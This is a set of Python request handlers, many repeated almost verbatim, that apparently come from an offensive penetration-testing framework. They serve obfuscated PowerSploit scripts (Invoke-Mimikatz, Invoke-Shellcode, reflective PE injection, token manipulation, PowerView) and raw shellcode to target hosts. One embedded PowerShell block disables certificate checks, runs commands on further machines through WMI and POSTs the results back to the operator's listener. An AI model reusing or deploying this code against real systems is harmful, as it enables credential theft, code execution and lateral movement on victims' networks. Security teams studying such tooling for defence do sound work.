def on_request(self, context, request): if 'Invoke-Shellcode.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open( os.path.join( base_dir, 'data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif os.path.basename(self.shellcode_path) == request.path[1:]: request.send_response(200) request.end_headers() with open(self.shellcode_path, 'rb') as shellcode: request.wfile.write(shellcode.read()) #Target has the shellcode, stop tracking the host request.stop_tracking_host() else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-TokenManipulation.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open( 'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1', 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif 'TokenRider.ps1' == request.path[1:]: request.send_response(200) request.end_headers() #Command to execute on the target system(s) command_to_execute = 'cmd.exe /c {}'.format(self.command) #context.log.debug(command_to_execute) #This will get executed in the process that was created with the impersonated token elevated_ps_command = ''' [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; function Send-POSTRequest {{ [CmdletBinding()] Param ( [string] $data ) $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($data); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); }} $post_output = ""; $targets = @({targets}); foreach ($target in $targets){{ try{{ Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}"; $post_output = $post_output + "Executed command on $target! `n"; }} catch {{ $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n"; }} }} Send-POSTRequest $post_output'''.format( server=context.server, addr=context.localip, port=context.server_port, targets=self.target_computers, command=command_to_execute) request.wfile.write(elevated_ps_command) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open( os.path.join( base_dir, 'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1' ), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif os.path.basename(self.payload_path) == request.path[1:]: request.send_response(200) request.end_headers() request.stop_tracking_host() with open(self.payload_path, 'rb') as payload: request.wfile.write(payload.read()) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-TokenManipulation.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(os.path.join(base_dir,'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif 'TokenRider.ps1' == request.path[1:]: request.send_response(200) request.end_headers() #Command to execute on the target system(s) command_to_execute = 'cmd.exe /c {}'.format(self.command) #context.log.debug(command_to_execute) #This will get executed in the process that was created with the impersonated token elevated_ps_command = ''' [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; function Send-POSTRequest {{ [CmdletBinding()] Param ( [string] $data ) $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($data); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); $request.GetResponse(); }} $post_output = ""; $targets = @({targets}); foreach ($target in $targets){{ try{{ Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}"; $post_output = $post_output + "Executed command on $target! `n"; }} catch {{ $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n"; }} }} Send-POSTRequest $post_output'''.format(server=context.server, addr=context.localip, port=context.server_port, targets=self.target_computers, command=command_to_execute) request.wfile.write(elevated_ps_command) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-TokenManipulation.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open('data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1', 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'PowerView.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open('data/PowerSploit/Recon/PowerView.ps1', 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read()) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-Mimikatz.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open(os.path.join(base_dir,'data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if "Invoke-Mimikatz.ps1" == request.path[1:]: request.send_response(200) request.end_headers() with open("data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1", "r") as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-Shellcode.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open('data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1', 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) request.stop_tracking_host() else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-Mimikatz.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open( os.path.join( base_dir, 'data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open('data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1', 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif os.path.basename(self.payload_path) == request.path[1:]: request.send_response(200) request.end_headers() request.stop_tracking_host() with open(self.payload_path, 'rb') as payload: request.wfile.write(payload.read()) else: request.send_response(404) request.end_headers()
def on_request(self, context, request): if 'Invoke-Shellcode.ps1' == request.path[1:]: request.send_response(200) request.end_headers() with open('data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1' ,'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script) elif os.path.basename(self.shellcode_path) == request.path[1:]: request.send_response(200) request.end_headers() with open(self.shellcode_path, 'rb') as shellcode: request.wfile.write(shellcode.read()) #Target has the shellcode, stop tracking the host request.stop_tracking_host() else: request.send_response(404) request.end_headers()